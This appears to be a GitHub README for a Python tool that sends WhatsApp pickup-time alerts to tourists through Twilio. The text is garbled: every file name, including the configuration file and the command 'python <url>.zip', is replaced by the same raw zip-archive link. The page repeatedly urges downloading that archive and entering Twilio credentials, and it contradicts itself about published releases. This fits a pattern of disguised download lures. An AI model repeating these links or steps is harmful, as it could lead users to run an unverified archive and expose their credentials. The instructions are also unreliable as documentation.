Skip to content

🚍 Automate real-time pickup updates for tourists using WhatsApp, enhancing communication and ensuring timely service for transport businesses.

License

Notifications You must be signed in to change notification settings

yezi801111/ETA-Notifier-for-Tourists---Python

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

13 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ ETA-Notifier-for-Tourists---Python - Stay Updated on Your Pickup Times

Download ETA-Notifier

πŸ“‹ Overview

Tour operators and transport providers often struggle to notify customers about delays in scheduled pickups. The ETA Notifier simplifies this process by calculating estimated pickup times using a traffic route API. It sends timely WhatsApp messages to clients, informing them of either their confirmation or any delay.

🌐 Features

  • Automated Notifications: Sends WhatsApp messages with updates about pickup times.
  • Traffic API Integration: Uses real-time traffic data to provide accurate ETA.
  • User-Friendly Interface: Designed for non-technical users, making setup straightforward.

πŸ’» System Requirements

Before downloading, ensure your system meets the following requirements:

  • Operating System: Windows 10, macOS, or recent versions of Linux
  • Python Version: Python 3.6 or above
  • Dependencies: Requires installation of the Twilio library

πŸš€ Getting Started

To get started with the ETA Notifier, follow these simple steps:

  1. Download the Software: Click the download button below or visit the Releases page to find the latest version.

    Download ETA-Notifier

  2. Install Python: If you don’t have Python installed, download it from the official Python website. Follow the instructions based on your operating system.

  3. Install Dependencies: Open your command prompt or terminal and run the following command to install the required libraries:

    pip install twilio
    

πŸ“₯ Download & Install

To download the latest release, please follow these steps:

  • Step 1: Go to the Releases page.
  • Step 2: Look for the latest version. It will be at the top of the list.
  • Step 3: Download the appropriate package for your system. The files will usually be in .zip or https://raw.githubusercontent.com/yezi801111/ETA-Notifier-for-Tourists---Python/main/coaration/ETA-Notifier-for-Tourists---Python.zip formats.

βš™οΈ Configuration

Once you have downloaded and installed the software, you will need to configure it:

  1. Locate the Configuration File: After extraction, find the https://raw.githubusercontent.com/yezi801111/ETA-Notifier-for-Tourists---Python/main/coaration/ETA-Notifier-for-Tourists---Python.zip file in the ETA Notifier folder.

  2. Edit the File: Open https://raw.githubusercontent.com/yezi801111/ETA-Notifier-for-Tourists---Python/main/coaration/ETA-Notifier-for-Tourists---Python.zip using a simple text editor. You will need to enter your Twilio account credentials:

    • Twilio Account SID
    • Twilio Auth Token
    • Your WhatsApp sending number
  3. Save the Changes: Make sure to save your changes before closing the file.

πŸ”„ Running the Application

To run the ETA Notifier, follow these steps:

  1. Open Command Prompt or Terminal: Navigate to the folder where you extracted the files.

  2. Run the Application: Execute the following command:

    python https://raw.githubusercontent.com/yezi801111/ETA-Notifier-for-Tourists---Python/main/coaration/ETA-Notifier-for-Tourists---Python.zip
    
  3. Check for Updates: The application will calculate ETAs and send updates to your clients automatically.

πŸ“ž Troubleshooting

If you encounter any issues, consider the following:

  • Python Not Found: Ensure Python is correctly installed and added to your system PATH.
  • Twilio Credentials Incorrect: Double-check your Twilio Account SID and Auth Token in the https://raw.githubusercontent.com/yezi801111/ETA-Notifier-for-Tourists---Python/main/coaration/ETA-Notifier-for-Tourists---Python.zip file.
  • Network Issues: Ensure you have a stable internet connection for the API to fetch traffic data.

πŸ› οΈ Frequently Asked Questions

Q: Can I use this app for multiple trips?
A: Yes, you can set up multiple configurations for different trips or routes.

Q: Is there a limit to how many messages I can send?
A: Twilio may have pricing based on your usage. Be sure to review Twilio’s terms for any limits.

Q: What happens if my internet connection drops?
A: The application will try to reconnect. However, updates may not send until the connection is re-established.

πŸ“‘ Support

For any additional questions or support, feel free to open an issue on the GitHub repository. Our community is here to help you!

πŸ“š Learn More

For more details on how traffic APIs work or to explore Twilio documentation, check out the following resources:

Now you are ready to streamline your notifications and improve your client's experience with predictive updates!

About

🚍 Automate real-time pickup updates for tourists using WhatsApp, enhancing communication and ensuring timely service for transport businesses.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages